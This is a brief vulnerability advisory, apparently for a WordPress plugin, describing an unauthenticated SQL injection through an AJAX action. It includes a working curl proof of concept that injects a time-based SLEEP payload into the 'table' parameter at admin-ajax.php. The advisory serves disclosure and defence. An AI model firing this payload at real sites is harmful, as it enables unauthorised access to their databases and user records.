Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Run the command:
`curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&table=wp_users%20WHERE%20SLEEP(1)=1%20&request=browse" "https://example.com/wp-admin/admin-ajax.php"`
and see that the response is slow due to the `SLEEP` function.